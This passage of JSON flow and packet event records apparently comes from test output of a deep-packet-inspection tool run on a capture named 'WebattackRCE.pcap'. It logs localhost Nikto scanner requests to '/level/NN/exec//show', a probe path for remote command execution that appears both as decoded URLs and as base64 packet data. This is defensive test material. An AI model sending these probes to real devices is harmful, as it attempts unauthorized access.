{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 